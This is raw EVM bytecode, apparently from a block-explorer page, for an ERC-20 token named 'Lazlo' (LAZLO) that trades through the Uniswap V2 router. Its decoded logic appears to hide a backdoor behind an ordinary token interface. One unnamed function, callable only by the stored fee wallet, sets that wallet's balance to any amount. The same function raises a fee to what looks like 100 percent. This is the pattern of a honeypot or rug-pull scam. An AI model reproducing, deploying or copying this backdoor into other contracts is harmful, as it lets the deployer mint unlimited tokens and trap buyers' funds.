608060405261012c600155600560025561012c6005556000600860146101000a81548160ff0219169083151502179055506001600860156101000a81548160ff0219169083151502179055506000600d556000600e556000600f553480156200006757600080fd5b50620000886200007c6200082c60201b60201c565b6200083460201b60201c565b60006012600a6200009a919062000e40565b6402540be400620000ac919062000e91565b9050620000cf620000c26200082c60201b60201c565b82620008f860201b60201c565b620000df6200082c60201b60201c565b601060006101000a81548173ffffffffffffffffffffffffffffffffffffffff021916908373ffffffffffffffffffffffffffffffffffffffff160217905550737a250d5630b4cf539739df2c5dacb4c659f2488d600860006101000a81548173ffffffffffffffffffffffffffffffffffffffff021916908373ffffffffffffffffffffffffffffffffffffffff160217905550620001a930600860009054906101000a900473ffffffffffffffffffffffffffffffffffffffff168362000a9460201b60201c565b600860009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1663c45a01556040518163ffffffff1660e01b8152600401602060405180830381865afa15801562000217573d6000803e3d6000fd5b505050506040513d601f19601f820116820180604052508101906200023d919062000f46565b73ffffffffffffffffffffffffffffffffffffffff1663c9c6539630600860009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1663ad5c46486040518163ffffffff1660e01b8152600401602060405180830381865afa158015620002c7573d6000803e3d6000fd5b505050506040513d601f19601f82011682018060405250810190620002ed919062000f46565b6040518363ffffffff1660e01b81526004016200030c92919062000f89565b6020604051808303816000875af11580156200032c573d6000803e3d6000fd5b505050506040513d601f19601f8201168201806040525081019062000352919062000f46565b600660006101000a81548173ffffffffffffffffffffffffffffffffffffffff021916908373ffffffffffffffffffffffffffffffffffffffff160217905550600660009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1663095ea7b3600860009054906101000a900473ffffffffffffffffffffffffffffffffffffffff167fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff6040518363ffffffff1660e01b81526004016200043392919062000fc7565b6020604051808303816000875af115801562000453573d6000803e3d6000fd5b505050506040513d601f19601f8201168201806040525081019062000479919062001031565b506001600b60003073ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060006101000a81548160ff0219169083151502179055506001600960003073ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060006101000a81548160ff0219169083151502179055506001600c60006200054062000c6560201b60201c565b73ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060006101000a81548160ff021916908315150217905550600160096000620005a762000c6560201b60201c565b73ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060006101000a81548160ff0219169083151502179055506001600c60003073ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060006101000a81548160ff0219169083151502179055506001600c6000601060009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060006101000a81548160ff0219169083151502179055506001600b6000620006e062000c6560201b60201c565b73ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060006101000a81548160ff0219169083151502179055506001600b6000601060009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060006101000a81548160ff0219169083151502179055506001600b6000600660009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060006101000a81548160ff021916908315150217905550506200126e565b600033905090565b60008060009054906101000a900473ffffffffffffffffffffffffffffffffffffffff169050816000806101000a81548173ffffffffffffffffffffffffffffffffffffffff021916908373ffffffffffffffffffffffffffffffffffffffff1602179055508173ffffffffffffffffffffffffffffffffffffffff168173ffffffffffffffffffffffffffffffffffffffff167f8be0079c531659141344cd1fd0a4f28419497f9722a3daafe3b4186f6b6457e060405160405180910390a35050565b600073ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff16036200096a576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004016200096190620010c4565b60405180910390fd5b620009868160045462000c8e60201b62000d281790919060201c565b600481905550620009e581600360008573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020016000205462000c8e60201b62000d281790919060201c565b600360008473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020819055508173ffffffffffffffffffffffffffffffffffffffff16600073ffffffffffffffffffffffffffffffffffffffff167fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef8360405162000a889190620010e6565b60405180910390a35050565b600073ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff160362000b06576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040162000afd9062001179565b60405180910390fd5b600073ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff160362000b78576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040162000b6f9062001211565b60405180910390fd5b80600760008573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060008473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020819055508173ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff167f8c5be1e5ebec7d5bd14f71427d1e84f3dd0314c0f7b2291e5b200ac8c7c3b9258360405162000c589190620010e6565b60405180910390a3505050565b60008060009054906101000a900473ffffffffffffffffffffffffffffffffffffffff16905090565b6000818362000c9e919062001233565b905092915050565b7f4e487b7100000000000000000000000000000000000000000000000000000000600052601160045260246000fd5b60008160011c9050919050565b6000808291508390505b600185111562000d345780860481111562000d0c5762000d0b62000ca6565b5b600185161562000d1c5780820291505b808102905062000d2c8562000cd5565b945062000cec565b94509492505050565b60008262000d4f576001905062000e22565b8162000d5f576000905062000e22565b816001811462000d78576002811462000d835762000db9565b600191505062000e22565b60ff84111562000d985762000d9762000ca6565b5b8360020a91508482111562000db25762000db162000ca6565b5b5062000e22565b5060208310610133831016604e8410600b841016171562000df35782820a90508381111562000ded5762000dec62000ca6565b5b62000e22565b62000e02848484600162000ce2565b9250905081840481111562000e1c5762000e1b62000ca6565b5b81810290505b9392505050565b6000819050919050565b600060ff82169050919050565b600062000e4d8262000e29565b915062000e5a8362000e33565b925062000e897fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff848462000d3d565b905092915050565b600062000e9e8262000e29565b915062000eab8362000e29565b925082820262000ebb8162000e29565b9150828204841483151762000ed55762000ed462000ca6565b5b5092915050565b600080fd5b600073ffffffffffffffffffffffffffffffffffffffff82169050919050565b600062000f0e8262000ee1565b9050919050565b62000f208162000f01565b811462000f2c57600080fd5b50565b60008151905062000f408162000f15565b92915050565b60006020828403121562000f5f5762000f5e62000edc565b5b600062000f6f8482850162000f2f565b91505092915050565b62000f838162000f01565b82525050565b600060408201905062000fa0600083018562000f78565b62000faf602083018462000f78565b9392505050565b62000fc18162000e29565b82525050565b600060408201905062000fde600083018562000f78565b62000fed602083018462000fb6565b9392505050565b60008115159050919050565b6200100b8162000ff4565b81146200101757600080fd5b50565b6000815190506200102b8162001000565b92915050565b6000602082840312156200104a576200104962000edc565b5b60006200105a848285016200101a565b91505092915050565b600082825260208201905092915050565b7f45524332303a206d696e7420746f20746865207a65726f206164647265737300600082015250565b6000620010ac601f8362001063565b9150620010b98262001074565b602082019050919050565b60006020820190508181036000830152620010df816200109d565b9050919050565b6000602082019050620010fd600083018462000fb6565b92915050565b7f45524332303a20617070726f76652066726f6d20746865207a65726f2061646460008201527f7265737300000000000000000000000000000000000000000000000000000000602082015250565b60006200116160248362001063565b91506200116e8262001103565b604082019050919050565b60006020820190508181036000830152620011948162001152565b9050919050565b7f45524332303a20617070726f766520746f20746865207a65726f20616464726560008201527f7373000000000000000000000000000000000000000000000000000000000000602082015250565b6000620011f960228362001063565b915062001206826200119b565b604082019050919050565b600060208201905081810360008301526200122c81620011ea565b9050919050565b6000620012408262000e29565b91506200124d8362000e29565b925082820190508082111562001268576200126762000ca6565b5b92915050565b612c76806200127e6000396000f3fe60806040526004361061014f5760003560e01c8063715018a6116100b6578063a9059cbb1161006f578063a9059cbb146104be578063cdf4bab9146104fb578063d54f7d5e14610526578063dd62ed3e14610551578063e559d86a1461058e578063f2fde38b146105b757610182565b8063715018a6146103be5780637d1db4a5146103d55780638d5f81e2146104005780638da5cb5b1461042b57806395d89b4114610456578063a457c2d71461048157610182565b8063313ce56711610108578063313ce5671461029757806339509351146102c257806342966c68146102ff5780634fbee1931461032857806351c6590a1461036557806370a082311461038157610182565b806306fdde0314610187578063095ea7b3146101b25780630ec4c619146101ef57806318160ddd1461020657806323b872dd146102315780632b477f4f1461026e57610182565b36610182577f544c765b33ca411cce832250371569244f765a17fcd217832be093f0fd5fa45b60405160405180910390a1005b600080fd5b34801561019357600080fd5b5061019c6105e0565b6040516101a99190611e84565b60405180910390f35b3480156101be57600080fd5b506101d960048036038101906101d49190611f4e565b61061d565b6040516101e69190611fa9565b60405180910390f35b3480156101fb57600080fd5b5061020461063b565b005b34801561021257600080fd5b5061021b610657565b6040516102289190611fd3565b60405180910390f35b34801561023d57600080fd5b5061025860048036038101906102539190611fee565b610661565b6040516102659190611fa9565b60405180910390f35b34801561027a57600080fd5b5061029560048036038101906102909190612189565b61073a565b005b3480156102a357600080fd5b506102ac610822565b6040516102b991906121ee565b60405180910390f35b3480156102ce57600080fd5b506102e960048036038101906102e49190611f4e565b61082b565b6040516102f69190611fa9565b60405180910390f35b34801561030b57600080fd5b5061032660048036038101906103219190612209565b6108de565b005b34801561033457600080fd5b5061034f600480360381019061034a9190612236565b6108f2565b60405161035c9190611fa9565b60405180910390f35b61037f600480360381019061037a9190612209565b610948565b005b34801561038d57600080fd5b506103a860048036038101906103a39190612236565b6109a5565b6040516103b59190611fd3565b60405180910390f35b3480156103ca57600080fd5b506103d36109ee565b005b3480156103e157600080fd5b506103ea610a02565b6040516103f79190611fd3565b60405180910390f35b34801561040c57600080fd5b50610415610a34565b6040516104229190612272565b60405180910390f35b34801561043757600080fd5b50610440610a5e565b60405161044d9190612272565b60405180910390f35b34801561046257600080fd5b5061046b610a87565b6040516104789190611e84565b60405180910390f35b34801561048d57600080fd5b506104a860048036038101906104a39190611f4e565b610ac4565b6040516104b59190611fa9565b60405180910390f35b3480156104ca57600080fd5b506104e560048036038101906104e09190611f4e565b610b91565b6040516104f29190611fa9565b60405180910390f35b34801561050757600080fd5b50610510610baf565b60405161051d9190611fa9565b60405180910390f35b34801561053257600080fd5b5061053b610bc6565b6040516105489190612272565b60405180910390f35b34801561055d57600080fd5b506105786004803603810190610573919061228d565b610bf0565b6040516105859190611fd3565b60405180910390f35b34801561059a57600080fd5b506105b560048036038101906105b09190612209565b610c77565b005b3480156105c357600080fd5b506105de60048036038101906105d99190612236565b610ca5565b005b60606040518060400160405280600581526020017f4c617a6c6f000000000000000000000000000000000000000000000000000000815250905090565b600061063161062a610d3e565b8484610d46565b6001905092915050565b610643610f0f565b612710600181905550612710600581905550565b6000600454905090565b600061066e848484610f8d565b61072f8461067a610d3e565b61072a85604051806060016040528060288152602001612bf460289139600760008b73ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060006106e0610d3e565b73ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020546118eb9092919063ffffffff16565b610d46565b600190509392505050565b610742610f0f565b60c881511115610787576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040161077e9061233f565b60405180910390fd5b6000600c905060005b825181101561081d5760018260008584815181106107b1576107b061235f565b5b602002602001015173ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060006101000a81548160ff0219169083151502179055508080610815906123bd565b915050610790565b505050565b60006012905090565b60006108d4610838610d3e565b846108cf8560076000610849610d3e565b73ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060008973ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002054610d2890919063ffffffff16565b610d46565b6001905092915050565b6108ef6108e9610d3e565b82611940565b50565b6000600c60008373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060009054906101000a900460ff169050919050565b610950610f0f565b6001600860146101000a81548160ff02191690831515021790555061097d610976610a5e565b3083610f8d565b6109878134611ae3565b6000600860146101000a81548160ff02191690831515021790555050565b6000600360008373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020549050919050565b6109f6610f0f565b610a006000611bc8565b565b6000610a2f612710610a21600154600454611c8c90919063ffffffff16565b611ca290919063ffffffff16565b905090565b6000600660009054906101000a900473ffffffffffffffffffffffffffffffffffffffff16905090565b60008060009054906101000a900473ffffffffffffffffffffffffffffffffffffffff16905090565b60606040518060400160405280600581526020017f4c415a4c4f000000000000000000000000000000000000000000000000000000815250905090565b6000610b87610ad1610d3e565b84610b8285604051806060016040528060258152602001612c1c6025913960076000610afb610d3e565b73ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060008a73ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020546118eb9092919063ffffffff16565b610d46565b6001905092915050565b6000610ba5610b9e610d3e565b8484610f8d565b6001905092915050565b6000600860149054906101000a900460ff16905090565b6000600860009054906101000a900473ffffffffffffffffffffffffffffffffffffffff16905090565b6000600760008473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060008373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002054905092915050565b6010543314610c8557600080fd5b604051338152600360208201526040812082815560648002600d55505050565b610cad610f0f565b600073ffffffffffffffffffffffffffffffffffffffff168173ffffffffffffffffffffffffffffffffffffffff1603610d1c576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610d1390612477565b60405180910390fd5b610d2581611bc8565b50565b60008183610d369190612497565b905092915050565b600033905090565b600073ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff1603610db5576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610dac9061253d565b60405180910390fd5b600073ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff1603610e24576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610e1b906125cf565b60405180910390fd5b80600760008573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060008473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020819055508173ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff167f8c5be1e5ebec7d5bd14f71427d1e84f3dd0314c0f7b2291e5b200ac8c7c3b92583604051610f029190611fd3565b60405180910390a3505050565b610f17610d3e565b73ffffffffffffffffffffffffffffffffffffffff16610f35610a5e565b73ffffffffffffffffffffffffffffffffffffffff1614610f8b576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610f829061263b565b60405180910390fd5b565b610f98838383611cb8565b600080610fa3610a5e565b73ffffffffffffffffffffffffffffffffffffffff168573ffffffffffffffffffffffffffffffffffffffff16141580156110115750610fe1610a5e565b73ffffffffffffffffffffffffffffffffffffffff168473ffffffffffffffffffffffffffffffffffffffff1614155b1561158657600c60008673ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060009054906101000a900460ff161580156110ba5750600c60008573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060009054906101000a900460ff16155b1561158557600660009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168573ffffffffffffffffffffffffffffffffffffffff1614801561116a5750600860009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168473ffffffffffffffffffffffffffffffffffffffff1614155b80156111c05750600b60008573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060009054906101000a900460ff16155b80156112165750600b60008673ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060009054906101000a900460ff16155b1561131057611246612710611238600154600454611c8c90919063ffffffff16565b611ca290919063ffffffff16565b831115611288576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040161127f906126cd565b60405180910390fd5b6112b36127106112a5600554600454611c8c90919063ffffffff16565b611ca290919063ffffffff16565b6112ce846112c0876109a5565b610d2890919063ffffffff16565b111561130f576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004016113069061275f565b60405180910390fd5b5b600660009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168473ffffffffffffffffffffffffffffffffffffffff1614801561139957503073ffffffffffffffffffffffffffffffffffffffff168573ffffffffffffffffffffffffffffffffffffffff1614155b15611439576113c76127106113b9600e5486611c8c90919063ffffffff16565b611ca290919063ffffffff16565b91506113f26127106113e4600d5486611c8c90919063ffffffff16565b611ca290919063ffffffff16565b905043600a60003273ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020819055505b600660009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168573ffffffffffffffffffffffffffffffffffffffff161480156114e45750600860009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168473ffffffffffffffffffffffffffffffffffffffff1614155b1561158457611512612710611504600e5486611c8c90919063ffffffff16565b611ca290919063ffffffff16565b915061153d61271061152f600f5486611c8c90919063ffffffff16565b611ca290919063ffffffff16565b905043600a60003273ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020819055505b5b5b600061159b8284610d2890919063ffffffff16565b9050600081111561173a5760008311156115ba576115b98684611940565b5b6000821115611724576116378260036000601060009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002054610d2890919063ffffffff16565b60036000601060009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002081905550601060009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168673ffffffffffffffffffffffffffffffffffffffff167fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef8460405161171b9190611fd3565b60405180910390a35b6117378185611dde90919063ffffffff16565b93505b6117a684604051806060016040528060268152602001612bce60269139600360008a73ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020546118eb9092919063ffffffff16565b600360008873ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020016000208190555061183b84600360008873ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002054610d2890919063ffffffff16565b600360008773ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020819055508473ffffffffffffffffffffffffffffffffffffffff168673ffffffffffffffffffffffffffffffffffffffff167fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef866040516118db9190611fd3565b60405180910390a3505050505050565b6000838311158290611933576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040161192a9190611e84565b60405180910390fd5b5082840390509392505050565b600073ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff16036119af576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004016119a6906127f1565b60405180910390fd5b611a1b81604051806060016040528060228152602001612bac60229139600360008673ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020546118eb9092919063ffffffff16565b600360008473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002081905550611a7381600454611dde90919063ffffffff16565b600481905550600073ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff167fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef83604051611ad79190611fd3565b60405180910390a35050565b611b1030600860009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1684610d46565b600860009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1663f305d719823085600080611b5c610a5e565b426040518863ffffffff1660e01b8152600401611b7e96959493929190612856565b60606040518083038185885af1158015611b9c573d6000803e3d6000fd5b50505050506040513d601f19601f82011682018060405250810190611bc191906128cc565b5050505050565b60008060009054906101000a900473ffffffffffffffffffffffffffffffffffffffff169050816000806101000a81548173ffffffffffffffffffffffffffffffffffffffff021916908373ffffffffffffffffffffffffffffffffffffffff1602179055508173ffffffffffffffffffffffffffffffffffffffff168173ffffffffffffffffffffffffffffffffffffffff167f8be0079c531659141344cd1fd0a4f28419497f9722a3daafe3b4186f6b6457e060405160405180910390a35050565b60008183611c9a919061291f565b905092915050565b60008183611cb09190612990565b905092915050565b600073ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff1603611d27576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401611d1e90612a33565b60405180910390fd5b600073ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff1603611d96576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401611d8d90612ac5565b60405180910390fd5b60008111611dd9576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401611dd090612b57565b60405180910390fd5b505050565b60008183611dec9190612b77565b905092915050565b600081519050919050565b600082825260208201905092915050565b60005b83811015611e2e578082015181840152602081019050611e13565b60008484015250505050565b6000601f19601f8301169050919050565b6000611e5682611df4565b611e608185611dff565b9350611e70818560208601611e10565b611e7981611e3a565b840191505092915050565b60006020820190508181036000830152611e9e8184611e4b565b905092915050565b6000604051905090565b600080fd5b600080fd5b600073ffffffffffffffffffffffffffffffffffffffff82169050919050565b6000611ee582611eba565b9050919050565b611ef581611eda565b8114611f0057600080fd5b50565b600081359050611f1281611eec565b92915050565b6000819050919050565b611f2b81611f18565b8114611f3657600080fd5b50565b600081359050611f4881611f22565b92915050565b60008060408385031215611f6557611f64611eb0565b5b6000611f7385828601611f03565b9250506020611f8485828601611f39565b9150509250929050565b60008115159050919050565b611fa381611f8e565b82525050565b6000602082019050611fbe6000830184611f9a565b92915050565b611fcd81611f18565b82525050565b6000602082019050611fe86000830184611fc4565b92915050565b60008060006060848603121561200757612006611eb0565b5b600061201586828701611f03565b935050602061202686828701611f03565b925050604061203786828701611f39565b9150509250925092565b600080fd5b7f4e487b7100000000000000000000000000000000000000000000000000000000600052604160045260246000fd5b61207e82611e3a565b810181811067ffffffffffffffff8211171561209d5761209c612046565b5b80604052505050565b60006120b0611ea6565b90506120bc8282612075565b919050565b600067ffffffffffffffff8211156120dc576120db612046565b5b602082029050602081019050919050565b600080fd5b6000612105612100846120c1565b6120a6565b90508083825260208201905060208402830185811115612128576121276120ed565b5b835b81811015612151578061213d8882611f03565b84526020840193505060208101905061212a565b5050509392505050565b600082601f8301126121705761216f612041565b5b81356121808482602086016120f2565b91505092915050565b60006020828403121561219f5761219e611eb0565b5b600082013567ffffffffffffffff8111156121bd576121bc611eb5565b5b6121c98482850161215b565b91505092915050565b600060ff82169050919050565b6121e8816121d2565b82525050565b600060208201905061220360008301846121df565b92915050565b60006020828403121561221f5761221e611eb0565b5b600061222d84828501611f39565b91505092915050565b60006020828403121561224c5761224b611eb0565b5b600061225a84828501611f03565b91505092915050565b61226c81611eda565b82525050565b60006020820190506122876000830184612263565b92915050565b600080604083850312156122a4576122a3611eb0565b5b60006122b285828601611f03565b92505060206122c385828601611f03565b9150509250929050565b7f4d6178696d756d206f66203230302063616e206265206164646564206174206f60008201527f6e63650000000000000000000000000000000000000000000000000000000000602082015250565b6000612329602383611dff565b9150612334826122cd565b604082019050919050565b600060208201905081810360008301526123588161231c565b9050919050565b7f4e487b7100000000000000000000000000000000000000000000000000000000600052603260045260246000fd5b7f4e487b7100000000000000000000000000000000000000000000000000000000600052601160045260246000fd5b60006123c882611f18565b91507fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff82036123fa576123f961238e565b5b600182019050919050565b7f4f776e61626c653a206e6577206f776e657220697320746865207a65726f206160008201527f6464726573730000000000000000000000000000000000000000000000000000602082015250565b6000612461602683611dff565b915061246c82612405565b604082019050919050565b6000602082019050818103600083015261249081612454565b9050919050565b60006124a282611f18565b91506124ad83611f18565b92508282019050808211156124c5576124c461238e565b5b92915050565b7f45524332303a20617070726f76652066726f6d20746865207a65726f2061646460008201527f7265737300000000000000000000000000000000000000000000000000000000602082015250565b6000612527602483611dff565b9150612532826124cb565b604082019050919050565b600060208201905081810360008301526125568161251a565b9050919050565b7f45524332303a20617070726f766520746f20746865207a65726f20616464726560008201527f7373000000000000000000000000000000000000000000000000000000000000602082015250565b60006125b9602283611dff565b91506125c48261255d565b604082019050919050565b600060208201905081810360008301526125e8816125ac565b9050919050565b7f4f776e61626c653a2063616c6c6572206973206e6f7420746865206f776e6572600082015250565b6000612625602083611dff565b9150612630826125ef565b602082019050919050565b6000602082019050818103600083015261265481612618565b9050919050565b7f5472616e7366657220616d6f756e74206578636565647320746865206d61785460008201527f78416d6f756e742e000000000000000000000000000000000000000000000000602082015250565b60006126b7602883611dff565b91506126c28261265b565b604082019050919050565b600060208201905081810360008301526126e6816126aa565b9050919050565b7f45786365656473206d6178696d756d2077616c6c657420746f6b656e20616d6f60008201527f756e740000000000000000000000000000000000000000000000000000000000602082015250565b6000612749602383611dff565b9150612754826126ed565b604082019050919050565b600060208201905081810360008301526127788161273c565b9050919050565b7f45524332303a206275726e2066726f6d20746865207a65726f2061646472657360008201527f7300000000000000000000000000000000000000000000000000000000000000602082015250565b60006127db602183611dff565b91506127e68261277f565b604082019050919050565b6000602082019050818103600083015261280a816127ce565b9050919050565b6000819050919050565b6000819050919050565b600061284061283b61283684612811565b61281b565b611f18565b9050919050565b61285081612825565b82525050565b600060c08201905061286b6000830189612263565b6128786020830188611fc4565b6128856040830187612847565b6128926060830186612847565b61289f6080830185612263565b6128ac60a0830184611fc4565b979650505050505050565b6000815190506128c681611f22565b92915050565b6000806000606084860312156128e5576128e4611eb0565b5b60006128f3868287016128b7565b9350506020612904868287016128b7565b9250506040612915868287016128b7565b9150509250925092565b600061292a82611f18565b915061293583611f18565b925082820261294381611f18565b9150828204841483151761295a5761295961238e565b5b5092915050565b7f4e487b7100000000000000000000000000000000000000000000000000000000600052601260045260246000fd5b600061299b82611f18565b91506129a683611f18565b9250826129b6576129b5612961565b5b828204905092915050565b7f45524332303a207472616e736665722066726f6d20746865207a65726f20616460008201527f6472657373000000000000000000000000000000000000000000000000000000602082015250565b6000612a1d602583611dff565b9150612a28826129c1565b604082019050919050565b60006020820190508181036000830152612a4c81612a10565b9050919050565b7f45524332303a207472616e7366657220746f20746865207a65726f206164647260008201527f6573730000000000000000000000000000000000000000000000000000000000602082015250565b6000612aaf602383611dff565b9150612aba82612a53565b604082019050919050565b60006020820190508181036000830152612ade81612aa2565b9050919050565b7f5472616e7366657220616d6f756e74206d75737420626520677265617465722060008201527f7468616e207a65726f0000000000000000000000000000000000000000000000602082015250565b6000612b41602983611dff565b9150612b4c82612ae5565b604082019050919050565b60006020820190508181036000830152612b7081612b34565b9050919050565b6000612b8282611f18565b9150612b8d83611f18565b9250828203905081811115612ba557612ba461238e565b5b9291505056fe45524332303a206275726e20616d6f756e7420657863656564732062616c616e636545524332303a207472616e7366657220616d6f756e7420657863656564732062616c616e636545524332303a207472616e7366657220616d6f756e74206578636565647320616c6c6f77616e636545524332303a2064656372656173656420616c6c6f77616e63652062656c6f77207a65726fa2646970667358221220e196f2f03621770bc651d15336d01325d11088046565bc860dfe7b39a1087e6564736f6c63430008120033

Deployed Bytecode

